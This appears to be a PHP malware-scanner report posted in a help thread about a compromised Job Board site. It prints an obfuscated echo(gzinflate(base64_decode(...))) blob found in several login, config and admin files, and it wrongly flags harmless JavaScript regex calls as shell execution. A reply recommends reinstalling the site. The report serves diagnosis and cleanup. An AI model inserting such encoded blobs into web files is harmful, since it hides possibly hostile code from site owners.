 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/login.php on line 10:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/index.php on line 81:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
 if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
 scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/jobsb73/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
 scwExpValDay.exec(scwArrSeed[2]) == null
Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/config-default.php on line 320:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/admin/index.php on line 11:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Found 13 threats. Please discuss this on the forum (Opens in a new window)

It looks like your site was compromised by hackers.

Most likely, the file permissions allowed the hackers to write (inject code) to your site. Now your site has malware.

Best if you delete the whole site and install new Job Board from scratch. BUT make sure that the permissions are set properly this time!